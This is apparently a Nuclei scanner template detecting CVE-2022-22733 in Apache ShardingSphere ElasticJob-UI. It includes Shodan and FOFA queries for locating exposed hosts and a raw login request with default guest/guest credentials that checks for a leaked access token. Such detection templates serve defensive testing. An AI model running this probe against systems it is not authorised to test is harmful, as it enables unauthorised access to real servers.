id: CVE-2022-22733

info:
  name: Apache ShardingSphere ElasticJob-UI privilege escalation
  author: Zeyad Azima
  severity: medium
  description: |
    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has a guest account to perform privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to and control of the ElasticJob-UI application.
  remediation: |
    Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.
  reference:
    - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22733
    - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6
    - http://www.openwall.com/lists/oss-security/2022/01/20/2
    - https://github.com/Zeyad-Azima/CVE-2022-22733
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-22733
    cwe-id: CWE-200
    epss-score: 0.2493
    epss-percentile: 0.96665
    cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: shardingsphere_elasticjob-ui
    shodan-query: http.favicon.hash:816588900
    fofa-query: icon_hash=816588900
  tags: cve2022,cve,exposure,sharingsphere,apache

http:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Access-Token:
        Content-Type: application/json;charset=UTF-8
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        {"username":"guest","password":"guest"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"isGuest":true'
          - '"accessToken":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 490a0046304402206caf689c010af6339cb5400f8935265a009126993b2e9eb7225757a1fd1e970702205990fe4415667628846e7c83a4ca6c01b80a91d97b5b418eb014783b10fe9ad7:922c64590222798bb761d5b6d8e72950